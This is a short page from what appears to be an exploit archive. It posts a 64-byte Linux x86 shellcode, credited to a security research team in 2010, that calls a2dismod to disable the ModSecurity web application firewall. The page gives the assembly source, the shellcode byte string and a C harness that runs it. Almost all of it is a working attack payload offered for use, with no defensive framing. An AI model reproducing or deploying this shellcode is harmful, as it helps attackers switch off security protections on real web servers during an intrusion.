Home / os / winme

linux/x86 - disabled modsecurity - 64 bytes

Posted on 04 March 2010

=========================================== linux/x86 - disabled modsecurity - 64 bytes =========================================== /* sekfault@shellcode.com.ar - Goodfellas Security Research Team - 2010 * /usr/sbin/a2dismod mod-security2 - disable modsecurity * 64 bytes *__asm__( * "xor %eax,%eax " * "push %eax " * "cdq " * "push $0x646f6d73 " * "push $0x69643261 " * "push $0x2f6e6962 " * "push $0x732f7273 " * "push $0x752f2f2f " * "mov %esp,%ebx " * "push $0x32 " * "push $0x79746972 " * "push $0x75636573 " * "push $0x2d646f6d " * "mov %esp,%ecx " * "xor %edx,%edx " * "mov $0xb,%al " * "push %edx " * "push %ecx " * "push %ebx " * "mov %esp,%ecx " * "mov %esp,%edx " * "int $0x80 " ); */ char shellcode[]="x31xc0x50x99x68x73x6dx6fx64x68x61x32x64x69x68x62x69x6ex2fx68x73x72x2fx73x68x2fx2fx2fx75x89xe3x6ax32x68x72x69x74x79x68x73x65x63x75x68x6dx6fx64x2dx89xe1x31xd2xb0x0bx52x51x53x89xe1x89xe2xcdx80"; int main() { (*(void(*)())shellcode)(); return 0; } # ~ - [ [ : Inj3ct0r : ] ]

 

TOP

Malware :